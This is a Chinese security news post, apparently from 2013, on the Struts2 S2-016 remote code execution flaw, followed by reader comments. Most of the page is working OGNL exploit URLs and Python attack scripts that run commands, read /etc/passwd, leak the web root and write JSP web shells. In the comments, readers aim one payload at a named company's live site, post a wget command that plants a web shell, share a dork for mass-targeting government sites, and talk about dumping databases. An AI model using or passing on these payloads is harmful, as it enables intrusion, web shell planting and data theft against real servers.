www.24xxoo.com

[更新]Struts2再爆远程代码执行漏洞（S2-016）

phper2013-07-17共859152人围观，发现 60 个不明物体漏洞

Struts又爆远程代码执行漏洞了！在这次的漏洞中，攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版本，参数action的值redirect以及redirectAction没有正确过滤，导致ognl代码执行。

描述

影响版本	 Struts 2.0.0 - Struts 2.3.15
报告者	 Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE编号      CVE-2013-2251

漏洞证明

参数会以OGNL表达式执行

http://host/struts2-blank/example/X.action?action:%25{3*4}

http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

代码执行

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

漏洞原理

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

Apache官方地址

国内网站受灾严重

以下仅供教学研究之用，严禁非法用途！

执行任意命令EXP，感谢X提供：

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

爆网站路径EXP，感谢h4ck0r提供：

 ?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

python执行任意命令，感谢h4ck0r提供

import urllib2,sys,re

def get(url, data):
	string = url + "?" + data
	req = urllib2.Request("%s"%string)
	response = urllib2.urlopen(req).read().strip()
	print strip(response)

def strip(str):
   tmp = str.strip()
   blank_line=re.compile('\x00')
   tmp=blank_line.sub('',tmp)
   return tmp

if __name__ == '__main__':
	url = sys.argv[1]
	cmd = sys.argv[2]
	cmd1 = sys.argv[3]
	attack="redirect:${%%23a%%3d(new%%20java.lang.ProcessBuilder(new%%20java.lang.String[]{'%s','%s'})).start(),%%23b%%3d%%23a.getInputStream(),%%23c%%3dnew%%20java.io.InputStreamReader(%%23b),%%23d%%3dnew%%20java.io.BufferedReader(%%23c),%%23e%%3dnew%%20char[50000],%%23d.read(%%23e),%%23matt%%3d%%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%%23matt.getWriter().println(%%23e),%%23matt.getWriter().flush(),%%23matt.getWriter().close()}"%(cmd,cmd1)
	get(url,attack)

GETSHELL EXP，感谢coffee提供：

?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%

然后用以下代码写shell:

<form action="http://www.***.jp/acdap/test.jsp?f=1.jsp&quot; method="post">
<textarea >code</textarea>
<input type=submit value="提交">
</form>

上前目录生成1.jsp

这些评论亮了

X回复

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

)40(亮了
命运回复

不息抢沙发好速度，话说乌云又有SB在刷分了。黑产的大好机会不把握，呵呵。

)26(亮了
hackmissmiss(1级)回复

刷你妈的分一群小朋友为了满足自己的虚荣心不停的找网站刷分 SB

)19(亮了
生生不息回复

https://kf.sf-express.com/css/loginmgmt/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}

)19(亮了
fake回复

乌云已经开始了……黑阔们拖库吧……

)17(亮了

发表评论

已有 60 条评论

生生不息 2013-07-17回复1楼

目测利用工具马上出炉

POC来自官方：
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://struts.apache.org/release/2.3.x/docs/s2-017.htm
。。碉堡不

亮了(6)
fake 2013-07-17回复2楼

乌云已经开始了……黑阔们拖库吧……

亮了(17)
命运 2013-07-17回复3楼

不息抢沙发好速度，话说乌云又有SB在刷分了。黑产的大好机会不把握，呵呵。

亮了(26)
n0bele (1级)alert(document.cookie) 2013-07-17回复4楼

这真是个好厂商，没它黑帽子和那些又做黑产又做白帽子的帽子都快戴不稳了.

亮了(9)
hackmissmiss (1级) 2013-07-17回复5楼

刷你妈的分一群小朋友为了满足自己的虚荣心不停的找网站刷分 SB

亮了(19)
蓝风 (1级) 2013-07-17回复6楼

少侠记得提下裤子。。。。。。

亮了(1)
mujj (1级) 2013-07-17回复7楼

刷分又开始了么

亮了(1)
angellover08 (4级) 2013-07-17回复8楼

想投身黑产，木有门路啊

亮了(1)
z0mbie 2013-07-17回复9楼

小弟看不懂，哪位能给个执行命令的语句

亮了(9)
uj70ky7b (1级) 2013-07-17回复10楼

刷你妹妹的分啊，能吃吗. 一分等于几万块啊。

亮了(11)
X 2013-07-17回复11楼

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

亮了(40)
yplinfo (1级) 2013-07-17回复12楼

哎，SB才刷分

亮了(1)
Cr0w 2013-07-17回复13楼

S2-17
http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/
http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23

亮了(3)
生生不息 2013-07-17回复14楼

https://kf.sf-express.com/css/loginmgmt/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}

亮了(19)
lock (6级)独立安全研究员 2013-07-17回复15楼

import urllib2,getopt,sys

def info():
print "python struts.py -u http://baidu.com/test.action -d whoami"

def get(url, data):
string = url + "?" + data
req = urllib2.Request(string)
response = urllib2.urlopen(req)
print response.read()

if __name__ == '__main__' and len(sys.argv) < 2:
info()
try:
opts, args = getopt.getopt(sys.argv[1:],"u:d:")
except:
sys.exit(2)
for opt, value in opts:
if opt == '-u':
url = value
elif opt == '-d':
test = value
attack="?redirect:${#a=(new java.lang.ProcessBuilder('%s')).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}"%test
get(url,attack)

亮了(8)
二手玫瑰 (1级) 2013-07-17回复16楼

麻烦各位大神提供爆网站绝对路径的办法。。。。

亮了(0)
- h4ck0r 2013-07-17回复
  
  @二手玫瑰 ?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
  
  亮了(1)
pnig0s (7级)FreeBuf技术处书记 2013-07-17回复17楼

评论里各路大神都发威了：）

亮了(0)
元首 (2级) 2013-07-17回复18楼

路径

http://www.xxx.com/xxxx.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

亮了(2)
angellover08 (4级) 2013-07-17回复19楼

freebuf大牛众多，小弟在此膜拜。

亮了(0)
xiao_hen (4级)人是无法在快乐中成长的。快乐只能使人肤浅，我们在痛苦中成长，... 2013-07-17回复20楼

freebuf大牛众多，小弟在此膜拜。

亮了(0)
dennych0u (1级) 2013-07-17回复21楼

悲催的攻城狮们要精尽人亡了~

亮了(0)
z0mbie 2013-07-17回复22楼

请教各路神仙，怎么反弹SHELL,怎么写shell

亮了(0)
河蟹是亲爱的 2013-07-17回复23楼

getshell
wget http://www.sss.com/data/avatar/test.txt -O /home/www/test.jsp
test.txt是远程webshell的 /home/www/test.jsp 是目标目录

亮了(1)
hackmissmiss (1级) 2013-07-17回复24楼

怎么构造WGET POC

亮了(0)
free (1级) 2013-07-17回复25楼

求工具啊

亮了(0)
h4ck0r 2013-07-17回复26楼

执行任意命令：
example:python test.py http://baidu.com/test.action cat /etc/passwd

import urllib2,sys,re

def get(url, data):
string = url + “?” + data
req = urllib2.Request(“%s”%string)
response = urllib2.urlopen(req).read().strip()
print strip(response)

def strip(str):
tmp = str.strip()
blank_line=re.compile(‘\x00′)
tmp=blank_line.sub(”,tmp)
return tmp

if __name__ == ‘__main__’:
url = sys.argv[1]
cmd = sys.argv[2]
cmd1 = sys.argv[3]
attack=”redirect:${%%23a%%3d(new%%20java.lang.ProcessBuilder(new%%20java.lang.String[]{‘%s’,'%s’})).start(),%%23b%%3d%%23a.getInputStream(),%%23c%%3dnew%%20java.io.InputStreamReader(%%23b),%%23d%%3dnew%%20java.io.BufferedReader(%%23c),%%23e%%3dnew%%20char[50000],%%23d.read(%%23e),%%23matt%%3d%%23context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’),%%23matt.getWriter().println(%%23e),%%23matt.getWriter().flush(),%%23matt.getWriter().close()}”%(cmd,cmd1)
get(url,attack)

亮了(2)
- Hell0w0rld 2013-07-17回复
  
  @h4ck0r IndentationError: expected an indented block
  
  亮了(0)
coffee 2013-07-17回复27楼

我来个写shell的吧,当前目录生成test.jsp

?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e

然后用以下代码写shell:
<form action="http://www.***.jp/acdap/test.jsp?f=1.jsp" method="post">
<textarea >code</textarea>
<input type=submit value="提交">
</form>
上前目录生成1.jsp

亮了(4)
- apo 2013-07-18回复
  
  @coffee 我来个写shell的吧,当前目录生成test.jsp
  
  ?redirect:${
  %23req%3d%23context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletRequest’),
  %23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"),
  new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
  }&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
  
  然后用以下代码写shell:
  <form action="http://www.***.jp/acdap/test.jsp?f=1.jsp" method="post">
  <textarea name=t>code</textarea>
  <input type=submit value="提交">
  </form>
  上前目录生成1.jsp
  
  少了一个name=t <textarea name=t>code</textarea>
  
  亮了(2)
  - window 2013-07-18回复
    
    @apo 能生存test.jsp不能生成1.jsp啊！
    
    亮了(0)
  - apo 2013-07-18回复
    
    @window <form action="http://www.***.jp/acdap/test.jsp?f=1.jsp" method="post"
    
    楼主好像估计弄错两个地方。
    
    这样就可以了。
    
    亮了(1)
  - window 2013-07-18回复
    
    @apo 还是不能，
    
    亮了(0)
  - apo 2013-07-19回复
    
    @window
    那我就没办法了。补补HTML知识。。
    
    亮了(0)
tianya 2013-07-18回复28楼

就木有人发如何修复么？？？？？？？？？？？？？？？？？？？？？？？

亮了(2)
sudnog 2013-07-18回复29楼

JSP如何拖库？数据库的配置文件一般是哪里？STRUTS2让我第一次有机会接触到了jsp~~求教各位！

亮了(2)
Iamnothacker 2013-07-18回复30楼

用google发现了不少，确实可以批量抓了:
site:gov.cn inurl:index.action

亮了(2)
www 2013-07-18回复31楼

windows怎么搞？怎么wget

亮了(1)
抠脚大汉 2013-07-18回复32楼

http://hack.xiaoip.com/hack.php
在线版漏洞利用工具放出~~~傻瓜化了。

亮了(5)
- 艾斯比 2014-02-03回复
  
  @抠脚大汉能给份在线版的源码不 0.0 学习下 32楼好人 376741328@qq.com
  
  亮了(1)
hack (1级) 2013-07-18回复33楼

求助，我用执行任意命令EXP,得到一个/etc/passwd后有什么用啊?还有叫执行任意命令,是指哪些命令能执行啊？求大牛为小菜解惑，入入门

亮了(1)
n0bele (1级)alert(document.cookie) 2013-07-18回复34楼

/etc/passwd用户名表
/etc/shadow密码
根据权限看命令范围

亮了(1)
hack (1级) 2013-07-18回复35楼

哦，原理不是很懂，不过大概是清楚了，对了，这几个都是针对linux的，那不知道windows下是什么命令，我只记得是一个单词，if什么的好像，还是别的什么，记不起来了

亮了(0)
anonymous 2013-07-18回复36楼

好多装逼青年在行动，连尼玛windows命令都不熟悉还日个JB。

亮了(5)
222 2013-07-18回复37楼

5555

亮了(0)
骑士 2013-07-18回复38楼

http://netknight.in/archives/436/
利用工具在这我会乱说么

亮了(4)
黄永宏的主场 2013-07-19回复39楼

//: 转发微博

亮了(0)
柯南小胖道尔 2013-07-19回复40楼

我也喜欢pure servlet

亮了(0)
153斤哇TTTTT宏伟 2013-07-19回复41楼

//: 转发微博

亮了(0)
z0mbie 2013-07-19回复42楼

请教各位，.do后缀名怎么入侵？

亮了(1)
redcar (2级) 2013-07-20回复43楼

请问哪位知道这个redirect的功能是不是把%0a或者%0d过滤掉了？尝试了很多方法，返回的结果都是吧%0a和%0d给转换成了空格。因为看到了重定向，想尝试一下http分割响应，请问又什么绕过方法？

亮了(1)
cwg2552298 (6级)Follow my own course 2013-07-21回复44楼

Genius ！

亮了(0)
藤真 (2级)欢迎访问独自等待博客 http://www.waitalon... 2013-07-21回复45楼

php版利用工具 http://www.waitalone.cn/struts2-s2-16-exploits.html

亮了(1)
best迹部景吾1980 2013-07-21回复46楼

//: 转发微博

亮了(0)
地盘魔兵阿尔维斯1990 2013-07-21回复47楼

//: 转发微博

亮了(0)
丽雅Bella 2013-07-24回复48楼

//: 转发微博

亮了(0)
袁景峰2013 2013-07-24回复49楼

//: 转发微博

亮了(0)
在江湖绫濑雪弥1983 2013-07-27回复50楼

//: 转发微博

亮了(1)